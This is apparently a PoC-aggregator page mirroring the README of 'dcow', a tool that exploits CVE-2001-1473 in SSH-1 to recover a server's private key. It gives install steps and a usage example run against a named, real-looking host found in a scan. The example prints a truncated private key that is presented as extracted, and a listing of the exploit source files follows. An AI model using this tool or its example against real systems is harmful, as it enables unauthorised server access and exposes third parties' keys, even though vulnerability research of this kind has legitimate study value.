关联漏洞
标题:
SSH-1协议私钥计算漏洞
(CVE-2001-1473)
描述:SSH-1协议存在漏洞。远程服务器可以通过创建匹配目标Session ID但是使用比目标公共密钥更薄弱的公共密钥对的Session ID来进行中间人攻击以及重放客户端激励响应到目标服务器,攻击者可以计算相应私钥以及使用带有冒充目标的妥协密钥对的目标Session ID。
描述
poc-CVE-2001-1473
介绍
# How to exploit CVE-2001-1473
We employed a novel approach to an age-old vulnerability in the [SSH-1](https://packetstormsecurity.com/files/22442/ssh-1.2.30.tar.gz.html) protocol, as described by [CVE-2001-1473](https://nvd.nist.gov/vuln/detail/CVE-2001-1473). This vulnerability enables a Man-in-the-Middle (MITM) server to intercept an SSH-1 session between a client and a vulnerable server, potentially exposing the user's private key. However, executing a practical attack necessitates the client's usage of the attacking server as a hopping node and granting permission for unknown server keys, significantly increasing the complexity of a successful exploit.
Our adaptation of the original attack method enables the extraction of the SSH server's private key itself, offering access to the vulnerable server with sshd permissions. Notably, this modified approach eliminates the MITM requirement and can be executed directly against the vulnerable server.
For technical details, read [our paper](method.md).
# Install
```bash
./configure
make
make install
```
The code is installed in `/usr/local/bin`.
# Example
One of the vulnerable hosts detected in nuclei scan:
```
[CVE-2001-1473] [tcp] [high] nmr.ioc.ac.ru:22
```
Launching an attack:
```text
dcow -s nmr.ioc.ac.ru
pk retrieved:
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEA18RGKpk+UHIKVDnRcaoHI97YDp1mAu+9gMcako/uFZkRFG1p/XHz
CL+/EZ9cGc0KT6fRzAGHxxfeJ4j4gsAFzBFaMWx2jfEinduSQGdxi4JtdqCY2Y8+YrIORg
mpOtwi+Pxue1R4JndIhH+AXVUptODrU1clBtZePcLd5aG4JVzyX0c2+BA0ekadyhAySvqS
bTCTQNVt0eB0JUmHjYh3FIk9AjnAnDe6F7iPeq0dPwfSAY13QS3WGX38tMWjDHntrWACEf
9zE9QCDDquwM3hs3cah9c+jzvDK2AKD3EOwXHF8Df4CHZ2L4x3AXqxbRgZZE3+nTa0Dt4h
ITAsyKp7a0DVzCwtK0DB1LfUPkWnxeIMcZQkTdcjypr9/9VqgacHvZjmKOf3utBglHfnWk
...
```
# Disclaimer
This Proof of Concept (PoC) is intended solely for white-hat purposes and educational use. It has been created to demonstrate potential security vulnerabilities in a controlled, ethical, and lawful environment. It is not designed for malicious activity, exploitation of real systems, or any illegal purposes.
Any unauthorized or illegal use of this PoC is strictly prohibited and may result in legal consequences. The author is not responsible for any misuse of this code or any damage caused by its improper use.
Use this PoC responsibly, within the bounds of ethical hacking guidelines and in accordance with applicable laws.
文件快照
[4.0K] /data/pocs/6cc2a16861a3b1464171019d9d83460c2e96c488
├── [1.2M] configure
├── [ 947] CONTRIBUTING.md
├── [9.9K] dcow.cpp
├── [4.0K] golang
│ ├── [ 197] makefile
│ ├── [ 356] README.md
│ └── [4.0K] src
│ ├── [4.0K] expl
│ │ └── [8.1K] expl.go
│ └── [4.0K] main
│ └── [2.5K] main.go
├── [4.0K] legacy
│ ├── [ 10K] dcow.cpp
│ ├── [ 132] makefile
│ └── [ 150] README.md
├── [7.9K] method.md
├── [2.4K] README.md
└── [ 7] version
5 directories, 13 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。